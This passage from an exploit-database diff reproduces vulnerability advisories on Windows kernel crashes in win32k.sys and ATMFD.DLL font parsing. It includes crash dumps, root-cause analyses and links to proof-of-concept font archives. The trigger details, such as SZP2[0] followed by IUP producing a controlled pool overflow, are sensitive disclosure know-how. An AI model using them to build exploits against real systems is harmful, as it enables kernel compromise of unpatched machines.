969e3990 91e7594d 0000000a ff7bf000 969e3cd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
969e39c8 91efb78b 969e3c1c 969e3c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
969e3a0c 91e755d0 969e3cd0 0000000a 969e3c1c win32k!ESTROBJ::vInit+0x268
969e3c2c 91e75793 00000000 969e3cd0 fbe0ccf0 win32k!GreGetTextExtentExW+0x12a
969e3d0c 8264f896 0701015e 02bb0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
969e3d0c 779670f4 0701015e 02bb0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0015f434 00000000 00000000 00000000 00000000 0x779670f4
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!fsc_RemoveDups or another location in kernel space. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept font file together with the corresponding kernel crash log.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37915.zip

69
platforms/windows/dos/37916.txt Executable file
View file

@ -0,0 +1,69 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=392&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5)
Memory was referenced after it was freed.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ff404e04, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 9194bf53, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8276e84c
Unable to read MiSystemVaType memory at 8274df00
ff404e04
FAULTING_IP:
ATMFD+bf53
9194bf53 8a18 mov bl,byte ptr [eax]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD5
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 919477af to 9194bf53
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
9806b938 919477af 099e0403 fbfe2cf0 00000001 ATMFD+0xbf53
9806ba40 91943fe1 00000001 9806ba64 099e04c7 ATMFD+0x77af
9806ba84 916adce2 ff7af010 fbfe2cf0 00000001 ATMFD+0x3fe1
9806bacc 916ade59 ff7af010 fbfe2cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
9806bb40 916ab971 00000002 9806bcf4 00000000 win32k!RFONTOBJ::bInitCache+0xd4
9806bbfc 91727bb0 9806bcdc 9806bca0 00000007 win32k!RFONTOBJ::bRealizeFont+0x5df
9806bca8 91727deb fc17cd80 00000000 00000002 win32k!RFONTOBJ::bInit+0x2e3
9806bcc0 917549a0 9806bcdc 00000000 00000002 win32k!RFONTOBJ::vInit+0x16
9806bcec 91754a59 fbfe2cf0 00000000 0980f8a5 win32k!GreGetFontUnicodeRanges+0x2d
9806bd24 82641896 0d01016e 00000000 0017fcc4 win32k!NtGdiGetFontUnicodeRanges+0x17
9806bd24 779970f4 0d01016e 00000000 0017fcc4 nt!KiSystemServicePostCall
0017fcc4 00000000 00000000 00000000 00000000 0x779970f4
---
The bugcheck is caused by an attempt to read memory from an unmapped address. Specifically, the function is responsible for parsing the FDSelect region, and the crashing instruction is responsible for checking the version byte (can be either 0 or 3). The reason of the bugcheck is the fact that the kernel doesn't perform any bounds checking against the 32-bit FDSelect offset specified in the Top DICT, key "12 37", and instead uses it directly as an index into a user-mode input data buffer. While invalid user-mode memory accesses are gracefully handled by ATMFD, the controlled offset can be set on 32-bit platforms such that it points into kernel space, thus resulting in a reproducible system bugcheck.
To our current knowledge, this condition can only lead to an out-of-bounds read, thus limiting the impact of the bug to remote denial of service, or potentially local kernel memory disclosure. However, we have not fully confirmed that the severity of the bug is not in fact more significant due to some further ATMFD logic we are not aware of.
The issue reproduces on reliably Windows 7 and 8.1. It is easiest to reproduce and possibly exploit on 32-bit versions of Windows, as the "buffer + 32-bit controlled offset" expression evaluates to a kernel-mode address, while on 64-bit platforms it remains in the user space area and therefore the exception is gracefully handled by the ATMFD.DLL exception handler.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37916.zip

69
platforms/windows/dos/37917.txt Executable file
View file

@ -0,0 +1,69 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=386&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5)
Memory was referenced after it was freed.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fc937cdf, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 91d75195, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 827a784c
Unable to read MiSystemVaType memory at 82786f00
fc937cdf
FAULTING_IP:
ATMFD+35195
91d75195 803802 cmp byte ptr [eax],2
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD5
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91d7598d to 91d75195
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
8ba91638 91d7598d 8ba91890 00af0000 8ba91890 ATMFD+0x35195
8ba91730 91d74ee4 8ba91890 00af0000 8ba9174c ATMFD+0x3598d
8ba91834 91d75044 8ba91890 00af0000 8ba91968 ATMFD+0x34ee4
8ba91868 91d4512a 00000000 8ba91890 00af0000 ATMFD+0x35044
8ba91908 91d4718f 00000004 00000001 00000002 ATMFD+0x512a
8ba91988 91d43c8e 00000000 00000000 98435600 ATMFD+0x718f
8ba91a6c 91a67a9a 00000004 fc97efc0 fc95eff8 ATMFD+0x3c8e
8ba91ab4 91a679ec 00000001 fc97efc0 fc95eff8 win32k!PDEVOBJ::LoadFontFile+0x3c
8ba91af4 91a6742d ffa66130 00000019 fc97efc0 win32k!vLoadFontFileView+0x291
8ba91b80 91a5641f 8ba91c58 00000019 00000001 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x209
8ba91bcc 91a57403 8ba91c58 00000019 00000001 win32k!GreAddFontResourceWInternal+0xfb
8ba91d14 8267a896 000d3e78 00000019 00000001 win32k!NtGdiAddFontResourceW+0x142
8ba91d14 779c70f4 000d3e78 00000019 00000001 nt!KiSystemServicePostCall
002efa84 00000000 00000000 00000000 00000000 0x779c70f4
---
The bugcheck is caused by an attempt to read memory from an unmapped address. The specific expression being dereferenced by ATMFD.DLL is "base address of the Name INDEX data + NAME.offset[x] - 1", however no bounds checking is performed over the value of NAME.offset[x] before using it for pointer arithmetic. To our current knowledge, this condition can only lead to an out-of-bounds read, thus limiting the impact of the bug to remote denial of service, or potentially local kernel memory disclosure. However, we have not fully confirmed that the severity of the bug is not in fact more significant due to some further ATMFD logic we are not aware of.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with three proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37917.zip

134
platforms/windows/dos/37918.txt Executable file
View file

@ -0,0 +1,134 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=370&can=1
We have encountered a number of Windows kernel crashes in the win32k!scl_ApplyTranslation function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6c7000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 94860935, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
[...]
FAULTING_IP:
win32k!scl_ApplyTranslation+9b
94860935 011487 add dword ptr [edi+eax*4],edx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 94862292 to 94860935
STACK_TEXT:
8ad915ec 94862292 00000001 00000000 00000000 win32k!scl_ApplyTranslation+0x9b
8ad91610 9485f419 ff6ae250 ff6b24d8 ff6ae2c4 win32k!fsg_GridFit+0xdd
8ad91688 9486906c 00000001 8ad916a4 94868fc3 win32k!fs__Contour+0x287
8ad91694 94868fc3 ff6ae010 ff6ae07c 8ad916c0 win32k!fs_ContourGridFit+0x12
8ad916a4 9486991f ff6ae010 ff6ae07c 000000a4 win32k!fs_NewContourGridFit+0x10
8ad916c0 94869960 fc380e78 000000a4 8ad916fc win32k!bGetGlyphOutline+0xd7
8ad916e8 94869b59 fc380e78 000000a4 00000001 win32k!bGetGlyphMetrics+0x20
8ad9182c 9485ec63 fc380e78 000000a4 8ad91918 win32k!lGetGlyphBitmap+0x2b
8ad91850 9485eab6 00000000 00000001 000000a4 win32k!ttfdQueryFontData+0x158
8ad918a0 9485dce2 ff7af010 fbb4acf0 00000001 win32k!ttfdSemQueryFontData+0x45
8ad918e8 94863774 ff7af010 fbb4acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8ad91960 948dbc8d 8ad91c3c fba6cd68 ff6deca8 win32k!xInsertMetricsPlusRFONTOBJ+0x120
8ad91990 9485594d 0000000a ff7bf090 8ad91ce2 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8ad919c8 948db78b 8ad91c1c 8ad91c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8ad91a0c 948555d0 8ad91cd0 0000000a 8ad91c1c win32k!ESTROBJ::vInit+0x268
8ad91c2c 94855793 00000000 8ad91cd0 fbb4acf0 win32k!GreGetTextExtentExW+0x12a
8ad91d0c 82645896 03010292 007c0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8ad91d0c 772470f4 03010292 007c0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f9ac 00000000 00000000 00000000 00000000 0x772470f4
---
Depending on the malformed font file, the crashes are triggered at various locations in the win32k!scl_ApplyTranslation function:
win32k!scl_ApplyTranslation+43
win32k!scl_ApplyTranslation+9b
The crashes always occur while trying to access memory outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "maxp" and "hmtx" tables.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!scl_ApplyTranslation or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with three proof of concept font files together with corresponding kernel crash logs.
---------------------------------------------------------------------------------------------------------------------------------------------
While performing further analysis of some of the offending samples, we have found that sometimes buffers and structures in the pools align such that this condition causes an overwrite of function pointers residing in the font's fnt_GlobalGraphicStateType structure, consequently leading to crashes at invalid EIPs when one of these pointers is subsequently called. Several crashes such as the one shown below have been reproduced on Windows 7 32-bit with Special Pools enabled for win32k.sys:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: c1c00dc1, memory referenced.
Arg2: 00000008, value 0 = read operation, 1 = write operation.
Arg3: c1c00dc1, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
[...]
FAULTING_IP:
+0
c1c00dc1 ?? ???
MM_INTERNAL_CODE: 2
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 9224a9cc to c1c00dc1
STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
994574b4 9224a9cc 99457504 fb5a2efc fb5a2e94 0xc1c00dc1
994574c8 92244483 00000000 00000001 00000001 win32k!scl_CalcComponentOffset+0x21
99457538 92261ef8 00000800 fb5a2e94 fb5a2e94 win32k!fsg_MergeGlyphData+0x12a
99457574 9226238c fb5a2250 fb5a2f1c fb5a348c win32k!fsg_ExecuteGlyph+0x268
994575d0 92262202 fb5a2250 fb5a348c fb5a2ddc win32k!fsg_CreateGlyphData+0xea
99457610 9225f419 fb5a2250 fb5a348c fb5a22c4 win32k!fsg_GridFit+0x4d
99457688 9226906c 00000000 994576a4 92268fc3 win32k!fs__Contour+0x287
99457694 92268fc3 fb5a2010 fb5a207c 994576c0 win32k!fs_ContourGridFit+0x12
994576a4 9226991f fb5a2010 fb5a207c 00000080 win32k!fs_NewContourGridFit+0x10
994576c0 92269960 fbc5ee78 00000080 994576fc win32k!bGetGlyphOutline+0xd7
994576e8 92269b59 fbc5ee78 00000080 00000001 win32k!bGetGlyphMetrics+0x20
9945782c 9225ec63 fbc5ee78 00000080 99457918 win32k!lGetGlyphBitmap+0x2b
99457850 9225eab6 00000000 00000001 00000080 win32k!ttfdQueryFontData+0x158
994578a0 9225dce2 ff7af010 fe37ecf0 00000001 win32k!ttfdSemQueryFontData+0x45
994578e8 92263774 ff7af010 fe37ecf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
99457960 922dbc8d 99457c3c fbc2ebd8 ff6687fc win32k!xInsertMetricsPlusRFONTOBJ+0x120
99457990 9225594d 00000008 ff7bf040 99457cd8 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
994579c8 922db78b 99457c1c 99457c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
99457a0c 922555d0 99457cd0 00000008 99457c1c win32k!ESTROBJ::vInit+0x268
99457c2c 92255793 00000000 99457cd0 fe37ecf0 win32k!GreGetTextExtentExW+0x12a
99457d0c 82646896 060102a1 00150bb0 00000008 win32k!NtGdiGetTextExtentExW+0x141
99457d0c 77a070f4 060102a1 00150bb0 00000008 nt!KiSystemServicePostCall
0028f27c 00000000 00000000 00000000 00000000 0x77a070f4
---
I am attaching another archive with further 3 samples triggering crashes at invalid EIPs (as called by win32k!scl_CalcComponentOffset) on my test environment, together with corresponding crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37918.zip

91
platforms/windows/dos/37919.txt Executable file
View file

@ -0,0 +1,91 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=368&can=1
We have encountered a number of Windows kernel crashes in the win32k!itrp_IUP function (a handler of the IUP[] TTF program instruction) while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6895b8, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f4a4f1, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
[...]
FAULTING_IP:
win32k!itrp_IUP+2fb
91f4a4f1 8904b2 mov dword ptr [edx+esi*4],eax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91f4bc79 to 91f4a4f1
STACK_TEXT:
8adcf3b8 91f4bc79 00000001 91f517d3 00000000 win32k!itrp_IUP+0x2fb
8adcf3c0 91f517d3 00000000 ff64eb28 00b61838 win32k!itrp_InnerExecute+0x38
8adcf3f8 91f4bc79 ff64eb28 91f4f088 ff64ebbc win32k!itrp_CALL+0x23b
8adcf400 91f4f088 ff64ebbc ff64eb84 ff64f95c win32k!itrp_InnerExecute+0x38
8adcf480 91f53234 00b61804 00b61838 ff64eb28 win32k!itrp_Execute+0x2b2
8adcf4a8 91f529dc 00b61804 00b61838 ff64eb28 win32k!itrp_ExecuteGlyphPgm+0x4a
8adcf4dc 91f51e5e ff64a570 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x102
8adcf574 91f5238c ff64a250 ff64b73c ff64eb28 win32k!fsg_ExecuteGlyph+0x1ce
8adcf5d0 91f52202 ff64a250 ff64eb28 ff64b6b4 win32k!fsg_CreateGlyphData+0xea
8adcf610 91f4f419 ff64a250 ff64eb28 ff64a2c4 win32k!fsg_GridFit+0x4d
8adcf688 91f5906c 00000001 8adcf6a4 91f58fc3 win32k!fs__Contour+0x287
8adcf694 91f58fc3 ff64a010 ff64a07c 8adcf6c0 win32k!fs_ContourGridFit+0x12
8adcf6a4 91f5991f ff64a010 ff64a07c 00000027 win32k!fs_NewContourGridFit+0x10
8adcf6c0 91f59960 fb8b0e78 00000027 8adcf6fc win32k!bGetGlyphOutline+0xd7
8adcf6e8 91f59b59 fb8b0e78 00000027 00000001 win32k!bGetGlyphMetrics+0x20
8adcf82c 91f4ec63 fb8b0e78 00000027 8adcf918 win32k!lGetGlyphBitmap+0x2b
8adcf850 91f4eab6 00000000 00000001 00000027 win32k!ttfdQueryFontData+0x158
8adcf8a0 91f4dce2 ff7af010 fba32cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8adcf8e8 91f53774 ff7af010 fba32cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8adcf960 91fcbc8d 8adcfc3c fb87ec00 ff6470cc win32k!xInsertMetricsPlusRFONTOBJ+0x120
8adcf990 91f4594d 0000000a ff7bf000 8adcfcd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8adcf9c8 91fcb78b 8adcfc1c 8adcfc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8adcfa0c 91f455d0 8adcfcd0 0000000a 8adcfc1c win32k!ESTROBJ::vInit+0x268
8adcfc2c 91f45793 00000000 8adcfcd0 fba32cf0 win32k!GreGetTextExtentExW+0x12a
8adcfd0c 82657896 0801016f 02d90bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8adcfd0c 77b370f4 0801016f 02d90bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f6c4 00000000 00000000 00000000 00000000 0x77b370f4
---
Depending on the malformed font file, the crashes occur at various locations in the win32k!itrp_IUP function, such as:
win32k!itrp_IUP+141: test [esi+edx], cl
win32k!itrp_IUP+173: test [eax+edx], cl
win32k!itrp_IUP+17b: mov eax, [ecx+ebx*4]
win32k!itrp_IUP+184: mov ecx, [ecx]
win32k!itrp_IUP+213: mov eax, [ebx]
win32k!itrp_IUP+2c9: mov eax, [eax+esi*4]
win32k!itrp_IUP+2fb: mov [edx+esi*4], eax
win32k!itrp_IUP+317: add [eax+esi*4], edx
This is caused by the fact that the function operates (reads from and writes to) on memory well beyond of the dynamically allocated buffers, leading to a pool-based buffer overflow of controlled size and content, consequently allowing for remote code execution in the context of the Windows kernel.
It appears that the culprit of the vulnerability is the lack of handling of a corner case explicitly mentioned in the "The TrueType Instruction Set, Part 2" specification [1]:
"This instruction operates on points in the glyph zone pointed to by zp2. This zone should almost always be zone 1. Applying IUP to zone 0 is an error."
Every testcase we have examined contains an SZP2[] instruction ("Set Zone Pointer 2") with a 0 argument followed by the IUP[] instruction later on in the TTF program. The faulty instruction stream has the same outcome regardless of its location (i.e. font pre-program, glyph program etc.).
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in the form of a crash in win32k!itrp_IUP or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used.
Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37919.zip

112
platforms/windows/dos/37920.txt Executable file
View file

@ -0,0 +1,112 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=385&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: a3a3a3db, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f445c9, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
WRITE_ADDRESS: a3a3a3db
FAULTING_IP:
ATMFD+345c9
91f445c9 83483810 or dword ptr [eax+38h],10h
MM_INTERNAL_CODE: 2
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 91f10000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 879cfd8c -- (.trap 0xffffffff879cfd8c)
ErrCode = 00000002
eax=a3a3a3a3 ebx=00000008 ecx=00000004 edx=fb964900 esi=fb80e380 edi=fb80e3a0
eip=91f445c9 esp=879cfe00 ebp=879cfe10 iopl=0 nv up ei ng nz ac pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297
ATMFD+0x345c9:
91f445c9 83483810 or dword ptr [eax+38h],10h ds:0023:a3a3a3db=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 826f4ce7 to 826902d8
STACK_TEXT:
879cf8dc 826f4ce7 00000003 5e64199c 00000065 nt!RtlpBreakWithStatusInstruction
879cf92c 826f57e5 00000003 c06028e8 a3a3a3db nt!KiBugCheckDebugBreak+0x1c
879cfcf0 826a3391 00000050 a3a3a3db 00000001 nt!KeBugCheck2+0x68b
879cfd74 82655c48 00000001 a3a3a3db 00000000 nt!MmAccessFault+0x104
879cfd74 91f445c9 00000001 a3a3a3db 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
879cfe10 91f39eec fb964900 ff657038 91f563ec ATMFD+0x345c9
879cfe34 91f3e987 fb9bec70 91f563ec 00000f5c ATMFD+0x29eec
879d0544 91f3f6e0 fb9bec70 91f4f028 879d0790 ATMFD+0x2e987
879d0600 91f327ae fb9bec70 91f4f028 879d0790 ATMFD+0x2f6e0
879d06ec 91f32858 fb9bec70 879d0790 879d0814 ATMFD+0x227ae
879d0718 91f232b2 fb9bec70 91f4f028 879d0790 ATMFD+0x22858
879d087c 91f23689 ffffffff 879d099c fb874f58 ATMFD+0x132b2
879d08d0 91f1406d ffffffff 879d099c 00000000 ATMFD+0x13689
879d0924 91c7dcf2 ff7a5010 fbeeccf0 00000001 ATMFD+0x406d
879d096c 91c667cb ff7a5010 fbeeccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d09e0 91c91513 ffa6a130 fb81e8d0 0000004f win32k!xInsertMetricsRFONTOBJ+0x9c
879d0a14 91c935f5 00000020 879d0b2c 879d0c92 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d0cb8 91ca6684 040101b7 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
879d0d14 82652a66 040101b7 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d0d14 771870f4 040101b7 00000040 00000040 nt!KiSystemServicePostCall
0012f1d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The crash occurs while trying to modify memory under an invalid address. More specifically, the "a3a3a3a3" bytes found in the EAX register at the time of the crash are a repetition of a random byte filled by Driver Verifier in each pool allocation before returning it to the caller. This means that the dereferenced pointer is in fact an uninitialized value from the kernel pool.
The offending code (containing the crashing instruction) is as follows:
---
.text:000445C6 loc_445C6:
.text:000445C6 mov eax, [esi+ecx*4]
.text:000445C9 or dword ptr [eax+38h], 10h
.text:000445CD inc ecx
.text:000445CE cmp ecx, ebx
.text:000445D0 jl short loc_445C6
---
As shown above, there is a loop iterating EBX times over an array of addresses stored in [ESI]. At the time of the bugcheck, EBX=8, so the code expects 8 valid pointers in the array; however, only 4 pointers are properly initialized:
---
kd> dd fb80e380
fb80e380 fb964980 fb9649c0 fb964900 fb964940
fb80e390 a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
fb80e3a0 a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
---
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37920.zip

120
platforms/windows/dos/37921.txt Executable file
View file

@ -0,0 +1,120 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=384&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fff82008, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a3440b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL
READ_ADDRESS: fff82008
FAULTING_IP:
ATMFD+3440b
91a3440b 8b7e08 mov edi,dword ptr [esi+8]
MM_INTERNAL_CODE: 0
IMAGE_NAME: ATMFD.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 54e6a55a
MODULE_NAME: ATMFD
FAULTING_MODULE: 91a00000 ATMFD
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 97ff8d54 -- (.trap 0xffffffff97ff8d54)
ErrCode = 00000000
eax=ff677018 ebx=00000001 ecx=00000001 edx=0000000b esi=fff82000 edi=fb63e940
eip=91a3440b esp=97ff8dc8 ebp=97ff8de8 iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
ATMFD+0x3440b:
91a3440b 8b7e08 mov edi,dword ptr [esi+8] ds:0023:fff82008=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 82724ce7 to 826c02d8
STACK_TEXT:
97ff88a4 82724ce7 00000003 4b979438 00000065 nt!RtlpBreakWithStatusInstruction
97ff88f4 827257e5 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
97ff8cb8 826d3391 00000050 fff82008 00000000 nt!KeBugCheck2+0x68b
97ff8d3c 82685c48 00000000 fff82008 00000000 nt!MmAccessFault+0x104
97ff8d3c 91a3440b 00000000 fff82008 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
97ff8de8 91a345f7 fb6ba380 0000000b fb6ba3ac ATMFD+0x3440b
97ff8e10 91a29eec fb63e8c0 ff6770d8 91a463ec ATMFD+0x345f7
97ff8e34 91a2e987 fb8f4c70 91a463ec 00000f5c ATMFD+0x29eec
97ff9544 91a2f6e0 fb8f4c70 91a3f028 97ff9790 ATMFD+0x2e987
97ff9600 91a227ae fb8f4c70 91a3f028 97ff9790 ATMFD+0x2f6e0
97ff96ec 91a22858 fb8f4c70 97ff9790 97ff9814 ATMFD+0x227ae
97ff9718 91a132b2 fb8f4c70 91a3f028 97ff9790 ATMFD+0x22858
97ff987c 91a13689 ffffffff 97ff999c fb68af58 ATMFD+0x132b2
97ff98d0 91a0406d ffffffff 97ff999c 00000000 ATMFD+0x13689
97ff9924 91b2dcf2 ff7a5010 fb700cf0 00000001 ATMFD+0x406d
97ff996c 91b167cb ff7a5010 fb700cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
97ff99e0 91b41513 ffa6a130 fb93cb14 000000e0 win32k!xInsertMetricsRFONTOBJ+0x9c
97ff9a14 91b435f5 00000020 97ff9a3c 97ff9c74 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
97ff9cb8 91b56684 020101c3 00000100 00000020 win32k!GreGetCharABCWidthsW+0x147
97ff9d14 82682a66 020101c3 000000c0 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
